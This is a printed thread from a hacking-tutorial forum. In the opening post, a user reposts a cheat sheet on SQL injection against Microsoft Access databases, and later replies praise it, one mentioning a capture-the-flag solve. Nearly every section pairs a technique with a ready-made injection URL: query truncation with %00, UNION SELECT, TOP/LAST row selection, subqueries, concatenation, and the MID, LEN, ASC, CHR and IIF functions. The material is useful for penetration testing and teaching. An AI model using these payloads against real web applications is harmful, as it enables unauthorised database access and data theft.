SQL Injection Forum | Hacking & Exploit Tutorial - SQLiWiki
MS Access SQL injection Basic - Printable Version

+- SQL Injection Forum | Hacking & Exploit Tutorial - SQLiWiki (http://forum.sqliwiki.com)
+-- Forum: SQL Injection Tutorial (http://forum.sqliwiki.com/forumdisplay.php?fid=3)
+--- Forum: MS Access Tutorial (http://forum.sqliwiki.com/forumdisplay.php?fid=14)
+--- Thread: MS Access SQL injection Basic (/showthread.php?tid=31)



MS Access SQL injection Basic - BD_Inj3ct0r - 10-17-2015

MS Access sql injection Big Grin
 Syntax Error Message
Different error messages can be found during MS Access testing, depending on the specific web platform. As an example, two cases are hereby reported: Apache (PHP)
  • Fatal error: Uncaught exception 'com_exception' with message
    'Source: Microsoft JET Database Engine Description: [*********]
IIS (ASP)
  • Microsoft JET Database Engine error '80040e14'
 Query Comment
Comment characters are not available in Microsoft Access. As a result, in order to comment out the trailing part of an injectable query, we cannot use the usual notation with /**/ or -- or #*** However, it is possible to remove useless part of a query with the NULL char (%00)***  In case this character is not allowed (e.g. filtering via magic_quote_gpc in PHP), it is still possible to use the %16 character (SYN char) to achieve the same result. A query truncation looks like:
 http://localhost/script.asp?id=1'+UNION+SELECT+1,2,3,4+FROM+someValidTabName%00 Double encoding and other usual encoding techniques may be used to inject the characters above.
 UNION Operator
MS Access supports UNION and UNION ALL operators, although they require an existent table name within the FROM clause of the SELECT query. Table bruteforcing can be used to obtain a valid table name. Please refer to last section (Another Bruteforcing Technique) of this document.  Stacked Query
Stacked queries are not allowed. Forget about it.  
LIMIT Support
The LIMIT operator is not implemented within MS Access. However, it is possible to limit SELECT query results to the first N table rows using the TOP operator. TOP accepts as argument an integer, representing the number of rows to be returned. 
http://localhost/script.asp?id=1'+UNION+SELECT+TOP+3+someAttrName+FROM+validTable%00 
In the example above, the injected query returns the first 3 rows. In addition to TOP, the operator LAST can be used to fully emulate the behavior of LIMIT*** As LAST allows to select the last tuple, we can combine both functions in order to select a specific result. For example, to select the N-tuple we can use TOP N and then LAST***  
Subquery
Subqueries are supported by MS Access. In the following example, TOP 1 is used to return one row only: 
http://localhost/script.asp?id=1'+AND+(SELECT+TOP+1+'someData'+FROM+table)%00  
Hardcoded Query Returning 0 Rows
In some cases, it is useful to include in the web application response the outcome of our UNION SELECT query only, making the hardcoded query returning 0 results. A common trick can be used for our purpose:
 http://localhost/script.asp?id=1'+AND+1=0+UNION+SELECT+1,2,3+FROM+table%00  
String Concatenation
String concatenation is possible using the &(%26) and + (%2b) characters. As we are injecting these characters within an HTTP request, such value should be properly encoded: http://localhost/script.asp?id=1'+UNION+SELECT+'web'+%2b+'app'+FROM+table%00
http://localhost/script.asp?id=1'+UNION+SELECT+'web'+%26+'app'+FROM+table%00 
Both queries return the string “webapp”***  
Substring
The operator MID can be used to select a portion of a specified string: 
http://localhost/script.asp?id=1'+UNION+SELECT+MID('abcd',1,1)+FROM+table%00
http://localhost/script.asp?id=1'+UNION+SELECT+MID('abcd',2,1)+FROM+table%00 
The first query returns the character ‘a’, whereas the second query returns ‘b’*** 
String Lentgth
The operator LEN can be used in order to obtain the length of a string: 
http://localhost/script.asp?id=1'+UNION+SELECT+LEN('1234')+FROM+table%00 
The request above returns 4, the length of the string “1234”***  
ASCII Value From Char
The ASC operator returns the ASCII value of the character passed as argument:
 http://localhost/script.asp?id=1'+UNION+SELECT+ASC('A')+FROM+table%00 
The request above returns 65, the ASCII value of the character ‘A’***  
Char From ASCII Value
The CHR operator converts the argument character to its ASCII value: 
http://localhost/script.asp?id=1'+UNION+SELECT+CHR(65)+FROM+table%00 
The request above returns the character ‘A’***  
IF THEN Conditional Statement
 The IIF operator can be used to build an “if-then” conditional statement. As shown below, the syntax for this function is simple: IIF(condition, true, false)http://localhost/script.asp?id=1'+UNION+SELECT+IIF(1=1,'a','b')+FROM+table%00 The previous query returns the character ‘a’ as the condition 1=1 is always true.
Credits:
http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html


RE: MS Access SQL injection Basic - cyber4rt IND - 10-23-2015

nice share bro


RE: MS Access SQL injection Basic - Wax_Rola - 03-03-2016

I still remember that I got an idea from this tutorial to sove a ctf Big Grin

Thanks for sharing here


RE: MS Access SQL injection Basic - Xashik - 06-11-2016

Big Grin Nice Big Grin


RE: MS Access SQL injection Basic - NEPMAN2.4 - 08-20-2016

awesome